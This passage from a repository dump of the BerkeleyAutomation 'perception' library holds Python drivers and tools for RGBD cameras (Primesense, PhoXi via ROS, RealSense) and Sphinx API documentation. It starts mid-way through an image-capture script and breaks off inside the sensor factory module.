is not None:\n # deproject into 3D world coordinates\n point_cloud_cam = camera_intr.deproject(depth)\n point_cloud_cam.remove_zero_points()\n point_cloud_world = T_camera_world * point_cloud_cam\n\n # segment out the region in the workspace (objects only)\n seg_point_cloud_world, _ = point_cloud_world.box_mask(\n workspace\n )\n\n # compute the segmask for points above the box\n seg_point_cloud_cam = (\n T_camera_world.inverse() * seg_point_cloud_world\n )\n depth_im_seg = camera_intr.project_to_image(\n seg_point_cloud_cam\n )\n segmask = depth_im_seg.to_binary()\n\n # rescale segmask\n if rescale_factor != 1.0:\n segmask = segmask.resize(rescale_factor, interp=\"nearest\")\n\n # save segmask\n segmask.save(os.path.join(save_dir, \"segmask_%d.png\" % (i)))\n\n # rescale images\n if rescale_factor != 1.0:\n color = 
color.resize(rescale_factor)\n depth = depth.resize(rescale_factor, interp=\"nearest\")\n\n # save images\n color.save(os.path.join(save_dir, \"color_%d.png\" % (i)))\n depth.save(os.path.join(save_dir, \"depth_%d.npy\" % (i)))\n if ir is not None:\n ir.save(os.path.join(save_dir, \"ir_%d.npy\" % (i)))\n\n if vis:\n from visualization import Visualizer2D as vis2d\n\n num_plots = 3 if workspace is not None else 2\n vis2d.figure()\n vis2d.subplot(1, num_plots, 1)\n vis2d.imshow(color)\n vis2d.subplot(1, num_plots, 2)\n vis2d.imshow(depth)\n if workspace is not None:\n vis2d.subplot(1, num_plots, 3)\n vis2d.imshow(segmask)\n vis2d.show()\n\n sensor.stop()\n"
},
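The workspace segmentation in the script above is a deproject/mask/reproject round trip. A condensed sketch of the same pipeline on synthetic data (the camera parameters and box bounds are invented; the calls mirror the ones the script itself uses):

import numpy as np
from autolab_core import Box, CameraIntrinsics, DepthImage, RigidTransform

# Toy downward-looking camera and a flat synthetic depth map.
camera_intr = CameraIntrinsics(
    "cam", fx=200.0, fy=200.0, cx=32.0, cy=24.0, height=48, width=64
)
depth = DepthImage(0.5 * np.ones((48, 64), dtype=np.float32), frame="cam")
T_camera_world = RigidTransform(from_frame="cam", to_frame="world")

# Deproject to 3D, keep only points inside the workspace box, reproject.
workspace = Box(
    np.array([-0.05, -0.05, 0.4]), np.array([0.05, 0.05, 0.6]), frame="world"
)
point_cloud_world = T_camera_world * camera_intr.deproject(depth)
seg_world, _ = point_cloud_world.box_mask(workspace)
seg_cam = T_camera_world.inverse() * seg_world
segmask = camera_intr.project_to_image(seg_cam).to_binary()
print(segmask.data.shape)  # (48, 64)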
{
"alpha_fraction": 0.630094051361084,
"alphanum_fraction": 0.6520376205444336,
"avg_line_length": 20.200000762939453,
"blob_id": "9e39bb70fbb393c1af4ad036eae71f20a7227f7b",
"content_id": "5598f90ab280612393569ae8e52a1c3a1e96c9b0",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 319,
"license_type": "permissive",
"max_line_length": 46,
"num_lines": 15,
"path": "/docs/source/api/kinect_sensor.rst",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "Kinect Sensor\n=============\nInterfaces for the Kinect 2 RGBD sesnor.\n\nKinect2Sensor\n~~~~~~~~~~~~~\n.. autoclass:: perception.Kinect2Sensor\n\nVirtualKinect2Sensor\n~~~~~~~~~~~~~~~~~~~~\n.. autoclass:: perception.VirtualKinect2Sensor\n\nKinect2SensorFactory\n~~~~~~~~~~~~~~~~~~~~\n.. autoclass:: perception.Kinect2SensorFactory\n\n"
},
{
"alpha_fraction": 0.6821561455726624,
"alphanum_fraction": 0.6821561455726624,
"avg_line_length": 21.41666603088379,
"blob_id": "850459b5a5e6df228838bfef68d96d51f2818ab7",
"content_id": "8fc17abef2f9176cd4f71b67427517299bb57e39",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 538,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 24,
"path": "/docs/source/api/detector.rst",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "Detection\n=========\nClasses for finding a set of bounding boxes around objects of interest in an image.\n\nRgbdDetector\n~~~~~~~~~~~~\nAbstract class for detection from an RGBD image.\n\n.. autoclass:: perception.RgbdDetector\n\nRgbdDetection\n~~~~~~~~~~~~~\n.. autoclass:: perception.RgbdDetection\n\n\nRgbdForegroundMaskDetector\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. autoclass:: perception.RgbdForegroundMaskDetector\n\nRgbdForegroundMaskQueryImageDetector\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. autoclass:: perception.RgbdForegroundMaskQueryImageDetector\n"
},
{
"alpha_fraction": 0.6099706888198853,
"alphanum_fraction": 0.6138807535171509,
"avg_line_length": 23.35714340209961,
"blob_id": "5805040c5b821d1db2bc5a3dc00afb0065633f4c",
"content_id": "4edf97c4b002f9d4d6698b909ce24ae24806c244",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1023,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 42,
"path": "/tools/test_realsense.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "import matplotlib.pyplot as plt\nimport pyrealsense2 as rs\n\nfrom perception import RgbdSensorFactory\n\n\ndef discover_cams():\n \"\"\"Returns a list of the ids of all cameras connected via USB.\"\"\"\n ctx = rs.context()\n ctx_devs = list(ctx.query_devices())\n ids = []\n for i in range(ctx.devices.size()):\n ids.append(ctx_devs[i].get_info(rs.camera_info.serial_number))\n return ids\n\n\ndef main():\n ids = discover_cams()\n assert ids, \"[!] No camera detected.\"\n\n cfg = {}\n cfg[\"cam_id\"] = ids[0]\n cfg[\"filter_depth\"] = True\n cfg[\"frame\"] = \"realsense_overhead\"\n\n sensor = RgbdSensorFactory.sensor(\"realsense\", cfg)\n sensor.start()\n camera_intr = sensor.color_intrinsics\n color_im, depth_im, _ = sensor.frames()\n sensor.stop()\n\n print(\"intrinsics matrix: {}\".format(camera_intr.K))\n\n _, axes = plt.subplots(1, 2)\n for ax, im in zip(axes, [color_im.data, depth_im.data]):\n ax.imshow(im)\n ax.axis(\"off\")\n plt.show()\n\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.551014244556427,
"alphanum_fraction": 0.5579433441162109,
"avg_line_length": 29.54601287841797,
"blob_id": "23b5b8c7052dbfbf079b9424c7ae772d2e34697d",
"content_id": "7f15f021a730baf3dde735b40e4fce24ff2a83f4",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9958,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 326,
"path": "/perception/primesense_sensor.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "\"\"\"\nClass for interfacing with the Primesense Carmine RGBD sensor\nAuthor: Jeff Mahler\n\"\"\"\nimport logging\n\nimport numpy as np\nfrom autolab_core import CameraIntrinsics, ColorImage, DepthImage, Image\nfrom autolab_core.constants import MM_TO_METERS\nfrom primesense import openni2\n\nfrom .camera_sensor import CameraSensor\n\n\nclass PrimesenseRegistrationMode:\n \"\"\"Primesense registration mode.\"\"\"\n\n NONE = 0\n DEPTH_TO_COLOR = 1\n\n\nclass PrimesenseSensor(CameraSensor):\n \"\"\"Class for interacting with a Primesense RGBD sensor.\"\"\"\n\n # Constants for image height and width (in case they're needed somewhere)\n COLOR_IM_HEIGHT = 480\n COLOR_IM_WIDTH = 640\n DEPTH_IM_HEIGHT = 480\n DEPTH_IM_WIDTH = 640\n CENTER_X = float(DEPTH_IM_WIDTH - 1) / 2.0\n CENTER_Y = float(DEPTH_IM_HEIGHT - 1) / 2.0\n FOCAL_X = 525.0\n FOCAL_Y = 525.0\n FPS = 30\n OPENNI2_PATH = \"/home/autolab/Libraries/OpenNI-Linux-x64-2.2/Redist\"\n\n def __init__(\n self,\n registration_mode=PrimesenseRegistrationMode.DEPTH_TO_COLOR,\n auto_white_balance=False,\n auto_exposure=True,\n enable_depth_color_sync=True,\n flip_images=True,\n frame=None,\n ):\n self._device = None\n self._depth_stream = None\n self._color_stream = None\n self._running = None\n\n self._registration_mode = registration_mode\n self._auto_white_balance = auto_white_balance\n self._auto_exposure = auto_exposure\n self._enable_depth_color_sync = enable_depth_color_sync\n self._flip_images = flip_images\n\n self._frame = frame\n\n if self._frame is None:\n self._frame = \"primesense\"\n self._color_frame = \"{}_color\".format(self._frame)\n self._ir_frame = (\n self._frame\n ) # same as color since we normally use this one\n\n def __del__(self):\n \"\"\"Automatically stop the sensor for safety.\"\"\"\n if self.is_running:\n self.stop()\n\n @property\n def color_intrinsics(self):\n \"\"\":obj:`CameraIntrinsics` : Color camera intrinsics of primesense.\"\"\"\n return CameraIntrinsics(\n self._ir_frame,\n PrimesenseSensor.FOCAL_X,\n PrimesenseSensor.FOCAL_Y,\n PrimesenseSensor.CENTER_X,\n PrimesenseSensor.CENTER_Y,\n height=PrimesenseSensor.DEPTH_IM_HEIGHT,\n width=PrimesenseSensor.DEPTH_IM_WIDTH,\n )\n\n @property\n def ir_intrinsics(self):\n \"\"\":obj:`CameraIntrinsics` : IR camera intrinsics of primesense.\"\"\"\n return CameraIntrinsics(\n self._ir_frame,\n PrimesenseSensor.FOCAL_X,\n PrimesenseSensor.FOCAL_Y,\n PrimesenseSensor.CENTER_X,\n PrimesenseSensor.CENTER_Y,\n height=PrimesenseSensor.DEPTH_IM_HEIGHT,\n width=PrimesenseSensor.DEPTH_IM_WIDTH,\n )\n\n @property\n def is_running(self):\n \"\"\"bool : True if the stream is running, or false otherwise.\"\"\"\n return self._running\n\n @property\n def frame(self):\n \"\"\":obj:`str` : The reference frame of the sensor.\"\"\"\n return self._frame\n\n @property\n def color_frame(self):\n \"\"\":obj:`str` : The reference frame of the color sensor.\"\"\"\n return self._color_frame\n\n @property\n def ir_frame(self):\n \"\"\":obj:`str` : The reference frame of the IR sensor.\"\"\"\n return self._ir_frame\n\n def start(self):\n \"\"\"Start the sensor\"\"\"\n # open device\n openni2.initialize(PrimesenseSensor.OPENNI2_PATH)\n self._device = openni2.Device.open_any()\n\n # open depth stream\n self._depth_stream = self._device.create_depth_stream()\n self._depth_stream.configure_mode(\n PrimesenseSensor.DEPTH_IM_WIDTH,\n PrimesenseSensor.DEPTH_IM_HEIGHT,\n PrimesenseSensor.FPS,\n openni2.PIXEL_FORMAT_DEPTH_1_MM,\n )\n self._depth_stream.start()\n\n # open color stream\n 
self._color_stream = self._device.create_color_stream()\n        self._color_stream.configure_mode(\n            PrimesenseSensor.COLOR_IM_WIDTH,\n            PrimesenseSensor.COLOR_IM_HEIGHT,\n            PrimesenseSensor.FPS,\n            openni2.PIXEL_FORMAT_RGB888,\n        )\n        self._color_stream.camera.set_auto_white_balance(\n            self._auto_white_balance\n        )\n        self._color_stream.camera.set_auto_exposure(self._auto_exposure)\n        self._color_stream.start()\n\n        # configure device\n        if (\n            self._registration_mode\n            == PrimesenseRegistrationMode.DEPTH_TO_COLOR\n        ):\n            self._device.set_image_registration_mode(\n                openni2.IMAGE_REGISTRATION_DEPTH_TO_COLOR\n            )\n        else:\n            self._device.set_image_registration_mode(\n                openni2.IMAGE_REGISTRATION_OFF\n            )\n\n        self._device.set_depth_color_sync_enabled(\n            self._enable_depth_color_sync\n        )\n\n        self._running = True\n\n    def stop(self):\n        \"\"\"Stop the sensor\"\"\"\n        # check that everything is running\n        if not self._running or self._device is None:\n            logging.warning(\"Primesense not running. Aborting stop\")\n            return False\n\n        # stop streams\n        if self._depth_stream:\n            self._depth_stream.stop()\n        if self._color_stream:\n            self._color_stream.stop()\n        self._running = False\n\n        # Unload openni2\n        openni2.unload()\n        return True\n\n    def _read_depth_image(self):\n        \"\"\"Reads a depth image from the device\"\"\"\n        # read raw uint16 buffer\n        im_arr = self._depth_stream.read_frame()\n        raw_buf = im_arr.get_buffer_as_uint16()\n        buf_array = np.array(\n            [\n                raw_buf[i]\n                for i in range(\n                    PrimesenseSensor.DEPTH_IM_WIDTH\n                    * PrimesenseSensor.DEPTH_IM_HEIGHT\n                )\n            ]\n        )\n\n        # convert to image in meters\n        depth_image = buf_array.reshape(\n            PrimesenseSensor.DEPTH_IM_HEIGHT, PrimesenseSensor.DEPTH_IM_WIDTH\n        )\n        depth_image = depth_image * MM_TO_METERS  # convert to meters\n        if self._flip_images:\n            depth_image = np.flipud(depth_image)\n        else:\n            depth_image = np.fliplr(depth_image)\n        return DepthImage(depth_image, frame=self._frame)\n\n    def _read_color_image(self):\n        \"\"\"Reads a color image from the device\"\"\"\n        # read raw buffer\n        im_arr = self._color_stream.read_frame()\n        raw_buf = im_arr.get_buffer_as_triplet()\n        r_array = np.array(\n            [\n                raw_buf[i][0]\n                for i in range(\n                    PrimesenseSensor.COLOR_IM_WIDTH\n                    * PrimesenseSensor.COLOR_IM_HEIGHT\n                )\n            ]\n        )\n        g_array = np.array(\n            [\n                raw_buf[i][1]\n                for i in range(\n                    PrimesenseSensor.COLOR_IM_WIDTH\n                    * PrimesenseSensor.COLOR_IM_HEIGHT\n                )\n            ]\n        )\n        b_array = np.array(\n            [\n                raw_buf[i][2]\n                for i in range(\n                    PrimesenseSensor.COLOR_IM_WIDTH\n                    * PrimesenseSensor.COLOR_IM_HEIGHT\n                )\n            ]\n        )\n\n        # convert to uint8 image\n        color_image = np.zeros(\n            [\n                PrimesenseSensor.COLOR_IM_HEIGHT,\n                PrimesenseSensor.COLOR_IM_WIDTH,\n                3,\n            ]\n        )\n        color_image[:, :, 0] = r_array.reshape(\n            PrimesenseSensor.COLOR_IM_HEIGHT, PrimesenseSensor.COLOR_IM_WIDTH\n        )\n        color_image[:, :, 1] = g_array.reshape(\n            PrimesenseSensor.COLOR_IM_HEIGHT, PrimesenseSensor.COLOR_IM_WIDTH\n        )\n        color_image[:, :, 2] = b_array.reshape(\n            PrimesenseSensor.COLOR_IM_HEIGHT, PrimesenseSensor.COLOR_IM_WIDTH\n        )\n        if self._flip_images:\n            color_image = np.flipud(color_image.astype(np.uint8))\n        else:\n            color_image = np.fliplr(color_image.astype(np.uint8))\n        return ColorImage(color_image, frame=self._frame)\n\n    def frames(self):\n        \"\"\"Retrieve a new frame from the Primesense and convert it to a\n        ColorImage and a DepthImage.\n\n        Returns\n        -------\n        :obj:`tuple` of :obj:`ColorImage`, :obj:`DepthImage`\n            The ColorImage and DepthImage of the current frame.\n\n        Raises\n        ------\n        RuntimeError\n            If the Primesense stream is not running.\n        \"\"\"\n        color_im = self._read_color_image()\n        depth_im = self._read_depth_image()\n        return color_im, depth_im\n\n    def median_depth_img(self, num_img=1, fill_depth=0.0):\n        \"\"\"Collect a series of depth images and return the median of the set.\n\n        Parameters\n        ----------\n        num_img : int\n            The number of consecutive frames to process.\n\n        Returns\n        -------\n        :obj:`DepthImage`\n            The median DepthImage collected from the frames.\n        \"\"\"\n        depths = []\n\n        for _ in range(num_img):\n            _, depth = self.frames()\n            depths.append(depth)\n\n        median_depth = Image.median_images(depths)\n        median_depth.data[median_depth.data == 0.0] = fill_depth\n        return median_depth\n\n    def min_depth_img(self, num_img=1):\n        \"\"\"Collect a series of depth images and return the min of the set.\n\n        Parameters\n        ----------\n        num_img : int\n            The number of consecutive frames to process.\n\n        Returns\n        -------\n        :obj:`DepthImage`\n            The min DepthImage collected from the frames.\n        \"\"\"\n        depths = []\n\n        for _ in range(num_img):\n            _, depth = self.frames()\n            depths.append(depth)\n\n        return Image.min_images(depths)\n"
},
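Both Primesense drivers in this dump share one conversion worth seeing in isolation: OpenNI depth arrives as uint16 millimeters, and multiplying by `MM_TO_METERS` (1e-3) produces the float meters that `DepthImage` expects. A tiny sketch with a synthetic buffer:

import numpy as np
from autolab_core import DepthImage
from autolab_core.constants import MM_TO_METERS

# Stand-in for the uint16 millimeter frame read off the depth stream.
raw_mm = np.full((480, 640), 725, dtype=np.uint16)  # 725 mm everywhere

depth_m = (raw_mm * MM_TO_METERS).astype(np.float32)  # now meters
depth_im = DepthImage(depth_m, frame="primesense")
print(depth_im.data[0, 0])  # 0.725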
{
"alpha_fraction": 0.6230323314666748,
"alphanum_fraction": 0.6429163217544556,
"avg_line_length": 23.632652282714844,
"blob_id": "4aa2c41713c1d73acd012648a8fc88d83e6f80b5",
"content_id": "c9ca78ddc6c095971fa57e42990327fe9d24c699",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1207,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 49,
"path": "/tools/primesense_viewer.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "\"\"\"\nSimple tool to view output and fps of a primesense RGBD sensor\nAuthor: Jeff Mahler\n\"\"\"\nimport logging\nimport time\n\nimport numpy as np\nfrom visualization import Visualizer2D as vis\nfrom visualization import Visualizer3D as vis3d\n\nfrom perception import PrimesenseSensor\n\nif __name__ == \"__main__\":\n logging.getLogger().setLevel(logging.INFO)\n\n sensor = PrimesenseSensor()\n\n logging.info(\"Starting sensor\")\n sensor.start()\n camera_intr = sensor.ir_intrinsics\n\n n = 15\n frame_rates = []\n for i in range(n):\n logging.info(\"Reading frame %d of %d\" % (i + 1, n))\n read_start = time.time()\n color_im, depth_im, _ = sensor.frames()\n read_stop = time.time()\n frame_rates.append(1.0 / (read_stop - read_start))\n\n logging.info(\"Avg fps: %.3f\" % (np.mean(frame_rates)))\n\n color_im = color_im.inpaint(rescale_factor=0.5)\n depth_im = depth_im.inpaint(rescale_factor=0.5)\n point_cloud = camera_intr.deproject(depth_im)\n\n vis3d.figure()\n vis3d.points(point_cloud, subsample=15)\n vis3d.show()\n\n vis.figure()\n vis.subplot(1, 2, 1)\n vis.imshow(color_im)\n vis.subplot(1, 2, 2)\n vis.imshow(depth_im)\n vis.show()\n\n sensor.stop()\n"
},
{
"alpha_fraction": 0.6520681381225586,
"alphanum_fraction": 0.6520681381225586,
"avg_line_length": 15.86301326751709,
"blob_id": "29094fe753724381a460270c50d51cfd3a611b1c",
"content_id": "c7c59dc9cb27379393c3f70d953e452f84ad0a20",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 1233,
"license_type": "permissive",
"max_line_length": 58,
"num_lines": 73,
"path": "/docs/source/api/features.rst",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "Features\n========\nClasses for encapsulatng and modifying feature vectors.\n\nFeatureExtractor\n~~~~~~~~~~~~~~~~\n\n.. autoclass:: perception.FeatureExtractor\n\nCNNBatchFeatureExtractor\n~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. autoclass:: perception.CNNBatchFeatureExtractor\n\nCNNReusableBatchFeatureExtractor\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. autoclass:: perception.CNNReusableBatchFeatureExtractor\n\nFeature\n~~~~~~~\n\n.. autoclass:: perception.Feature\n\nBagOfFeatures\n~~~~~~~~~~~~~\n\n.. autoclass:: perception.BagOfFeatures\n\nLocalFeature\n~~~~~~~~~~~~\n\n.. autoclass:: perception.LocalFeature\n\nGlobalFeature\n~~~~~~~~~~~~~\n\n.. autoclass:: perception.GlobalFeature\n\nSHOTFeature\n~~~~~~~~~~~\n\n.. autoclass:: perception.SHOTFeature\n\nMVCNNFeature\n~~~~~~~~~~~~\n\n.. autoclass:: perception.MVCNNFeature\n\nCorrespondences\n~~~~~~~~~~~~~~~\n\n.. autoclass:: perception.Correspondences\n\nNormalCorrespondences\n~~~~~~~~~~~~~~~~~~~~~\n\n.. autoclass:: perception.NormalCorrespondences\n\nFeatureMatcher\n~~~~~~~~~~~~~~\n\n.. autoclass:: perception.FeatureMatcher\n\nRawDistanceFeatureMatcher\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. autoclass:: perception.RawDistanceFeatureMatcher\n\nPointToPlaneFeatureMatcher\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. autoclass:: perception.PointToPlaneFeatureMatcher\n\n\n"
},
{
"alpha_fraction": 0.5395489931106567,
"alphanum_fraction": 0.5554386973381042,
"avg_line_length": 30.46691131591797,
"blob_id": "4608d62e8fd9a8f06d8d3fd76c7a99ef209c8551",
"content_id": "91c28e9e14b110f06dfd5f5c24e5e8c1ad499137",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8559,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 272,
"path": "/perception/phoxi_ros_sensor.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "import logging\nimport time\n\nimport numpy as np\nimport rospy\nfrom autolab_core import CameraIntrinsics, DepthImage, GrayscaleImage, Image\nfrom cv_bridge import CvBridge, CvBridgeError\nfrom sensor_msgs.msg import Image as ImageMessage\nfrom std_srvs.srv import Empty\n\nfrom perception.srv import ConnectCamera, GetDeviceList, GetFrame, TriggerImage\n\nfrom .camera_sensor import CameraSensor\nfrom .exceptions import SensorUnresponsiveException\n\n\nclass PhoXiSensor(CameraSensor):\n \"\"\"Class for interfacing with a PhoXi Structured Light Sensor.\"\"\"\n\n def __init__(\n self, frame=\"phoxi\", device_name=\"2018-02-020-LC3\", size=\"small\"\n ):\n \"\"\"Initialize a PhoXi Sensor.\n\n Parameters\n ----------\n frame : str\n A name for the frame in which depth images, normal maps,\n and RGB images are returned.\n device_name : str\n The string name of the PhoXi device\n (SN listed on sticker on back sensor).\n Old PhoXi: 1703005\n New PhoXi: 2018-02-020-LC3\n size : str\n An indicator for which size of image is desired.\n Either 'large' (2064x1544) or 'small' (1032x772).\n \"\"\"\n\n self._frame = frame\n self._device_name = str(device_name)\n self._camera_intr = None\n self._running = False\n self._bridge = CvBridge()\n\n self._cur_color_im = None\n self._cur_depth_im = None\n self._cur_normal_map = None\n\n # Set up camera intrinsics for the sensor\n width, height = 2064, 1544\n focal_x, focal_y = 2244.0, 2244.0\n center_x, center_y = 1023.0, 768.0\n if size == \"small\":\n width = 1032\n height = 772\n focal_x = focal_x / 2\n focal_y = focal_y / 2\n center_x = center_x / 2\n center_y = center_y / 2\n\n if str(device_name) == \"1703005\":\n focal_x = focal_y = 1105.0\n\n self._camera_intr = CameraIntrinsics(\n self._frame,\n focal_x,\n focal_y,\n center_x,\n center_y,\n height=height,\n width=width,\n )\n\n def __del__(self):\n \"\"\"Automatically stop the sensor for safety.\"\"\"\n if self.is_running:\n self.stop()\n\n @property\n def color_intrinsics(self):\n \"\"\"CameraIntrinsics : Camera intrinsics for PhoXi Greyscale camera.\"\"\"\n return self._camera_intr\n\n @property\n def ir_intrinsics(self):\n \"\"\"CameraIntrinsics : Camera intrinsics for PhoXi IR camera.\"\"\"\n return self._camera_intr\n\n @property\n def is_running(self):\n \"\"\"bool : True if the stream is running, or false otherwise.\"\"\"\n return self._running\n\n @property\n def frame(self):\n \"\"\"str : The reference frame of the sensor.\"\"\"\n return self._frame\n\n @property\n def color_frame(self):\n \"\"\"str : The reference frame of the sensor.\"\"\"\n return self._frame\n\n @property\n def ir_frame(self):\n \"\"\"str : The reference frame of the sensor.\"\"\"\n return self._frame\n\n def start(self):\n \"\"\"Start the sensor.\"\"\"\n if rospy.get_name() == \"/unnamed\":\n raise ValueError(\"PhoXi sensor must be run inside a ros node!\")\n\n # Connect to the cameras\n if not self._connect_to_sensor():\n self._running = False\n return False\n\n # Set up subscribers for camera data\n self._color_im_sub = rospy.Subscriber(\n \"/phoxi_camera/texture\", ImageMessage, self._color_im_callback\n )\n self._depth_im_sub = rospy.Subscriber(\n \"/phoxi_camera/depth_map\", ImageMessage, self._depth_im_callback\n )\n self._normal_map_sub = rospy.Subscriber(\n \"/phoxi_camera/normal_map\", ImageMessage, self._normal_map_callback\n )\n\n self._running = True\n\n return True\n\n def stop(self):\n \"\"\"Stop the sensor.\"\"\"\n # Check that everything is running\n if not self._running:\n logging.warning(\"PhoXi 
not running. Aborting stop\")\n            return False\n\n        # Stop the subscribers\n        self._color_im_sub.unregister()\n        self._depth_im_sub.unregister()\n        self._normal_map_sub.unregister()\n\n        # Disconnect from the camera\n        rospy.ServiceProxy(\"phoxi_camera/disconnect_camera\", Empty)()\n\n        self._running = False\n\n        return True\n\n    def frames(self):\n        \"\"\"Retrieve a new frame from the PhoXi and convert it to a\n        ColorImage and a DepthImage.\n\n        Returns\n        -------\n        :obj:`tuple` of :obj:`ColorImage`, :obj:`DepthImage`\n            The ColorImage and DepthImage of the current frame.\n        \"\"\"\n        # Run a software trigger\n        rospy.ServiceProxy(\"phoxi_camera/start_acquisition\", Empty)()\n        rospy.ServiceProxy(\"phoxi_camera/trigger_image\", TriggerImage)()\n\n        self._cur_color_im = None\n        self._cur_depth_im = None\n        self._cur_normal_map = None\n\n        rospy.ServiceProxy(\"phoxi_camera/get_frame\", GetFrame)(-1)\n\n        max_time = 5.0\n        time_waiting = 0.0\n        while (\n            self._cur_color_im is None\n            or self._cur_depth_im is None\n            or self._cur_normal_map is None\n        ):\n            time.sleep(0.05)\n            time_waiting += 0.05\n            if time_waiting > max_time:\n                raise SensorUnresponsiveException(\n                    \"PhoXi sensor seems to be non-responsive\"\n                )\n        return self._cur_color_im, self._cur_depth_im\n\n    def median_depth_img(self, num_img=1, fill_depth=0.0):\n        \"\"\"Collect a series of depth images and return the median of the set.\n\n        Parameters\n        ----------\n        num_img : int\n            The number of consecutive frames to process.\n\n        Returns\n        -------\n        DepthImage\n            The median DepthImage collected from the frames.\n        \"\"\"\n        depths = []\n\n        for _ in range(num_img):\n            _, depth = self.frames()\n            depths.append(depth)\n\n        median_depth = Image.median_images(depths)\n        median_depth.data[median_depth.data == 0.0] = fill_depth\n        return median_depth\n\n    def _connect_to_sensor(self):\n        \"\"\"Connect to the sensor.\"\"\"\n        name = self._device_name\n        try:\n            # Check if device is actively in list\n            rospy.wait_for_service(\"phoxi_camera/get_device_list\")\n            device_list = rospy.ServiceProxy(\n                \"phoxi_camera/get_device_list\", GetDeviceList\n            )().out\n            if not str(name) in device_list:\n                logging.error(\n                    \"PhoXi sensor {} not in list of active devices\".format(\n                        name\n                    )\n                )\n                return False\n\n            success = rospy.ServiceProxy(\n                \"phoxi_camera/connect_camera\", ConnectCamera\n            )(name).success\n            if not success:\n                logging.error(\n                    \"Could not connect to PhoXi sensor {}\".format(name)\n                )\n                return False\n\n            logging.debug(\"Connected to PhoXi Sensor {}\".format(name))\n            return True\n\n        except rospy.ServiceException as e:\n            logging.error(\"Service call failed: {}\".format(e))\n            return False\n\n    def _color_im_callback(self, msg):\n        \"\"\"Callback for handling textures (greyscale images).\"\"\"\n        try:\n            data = self._bridge.imgmsg_to_cv2(msg)\n            if np.max(data) > 255.0:\n                data = (\n                    255.0 * data / 1200.0\n                )  # Experimentally set value for white\n            data = np.clip(data, 0.0, 255.0).astype(np.uint8)\n            gsimage = GrayscaleImage(data, frame=self._frame)\n            self._cur_color_im = gsimage.to_color()\n        except (CvBridgeError, ValueError):\n            self._cur_color_im = None\n\n    def _depth_im_callback(self, msg):\n        \"\"\"Callback for handling depth images.\"\"\"\n        try:\n            self._cur_depth_im = DepthImage(\n                self._bridge.imgmsg_to_cv2(msg) / 1000.0, frame=self._frame\n            )\n        except (CvBridgeError, ValueError):\n            self._cur_depth_im = None\n\n    def _normal_map_callback(self, msg):\n        \"\"\"Callback for handling normal maps.\"\"\"\n        try:\n            self._cur_normal_map = self._bridge.imgmsg_to_cv2(msg)\n        except (CvBridgeError, 
ValueError):\n self._cur_normal_map = None\n"
},
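A minimal usage sketch for the PhoXiSensor record above (not part of the dataset entry; it assumes a running ROS master and the phoxi_camera driver node):
# Hypothetical usage; device_name must match a serial in the driver's device list.
import rospy
from perception import RgbdSensorFactory

rospy.init_node("phoxi_demo")  # start() refuses to run in an unnamed node
cfg = {"frame": "phoxi", "device_name": "2018-02-020-LC3", "size": "small"}
sensor = RgbdSensorFactory.sensor("phoxi", cfg)
if sensor.start():
    color_im, depth_im = sensor.frames()  # blocks up to 5 s for both images
    sensor.stop()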
{
"alpha_fraction": 0.5868756771087646,
"alphanum_fraction": 0.5887354016304016,
"avg_line_length": 31.73043441772461,
"blob_id": "a53648baf9a82682222f355452d40d698868894b",
"content_id": "271e06e623e9f1dcae35b374b38745ea3f38faa1",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3764,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 115,
"path": "/perception/rgbd_sensors.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "\"\"\"\nRGBD Sensor factory\nAuthor: Jeff Mahler\n\"\"\"\n\nfrom . import exceptions\nfrom .virtual_camera_sensor import TensorDatasetVirtualSensor, VirtualSensor\nfrom .webcam_sensor import WebcamSensor\n\ntry:\n from .kinect2_sensor import Kinect2Sensor\nexcept BaseException as E:\n Kinect2Sensor = exceptions.closure(E)\n\ntry:\n from .kinect2_ros_sensor import KinectSensorBridged\nexcept BaseException as E:\n KinectSensorBridged = exceptions.closure(E)\n\ntry:\n from .primesense_sensor import PrimesenseSensor\nexcept BaseException as E:\n PrimesenseSensor = exceptions.closure(E)\n\ntry:\n from .primesense_ros_sensor import PrimesenseSensor_ROS\nexcept BaseException as E:\n PrimesenseSensor_ROS = exceptions.closure(E)\n\ntry:\n from .realsense_sensor import RealSenseSensor\nexcept BaseException as E:\n RealSenseSensor = exceptions.closure(E)\n\ntry:\n from .ensenso_sensor import EnsensoSensor\nexcept BaseException as E:\n EnsensoSensor = exceptions.closure(E)\n\ntry:\n from 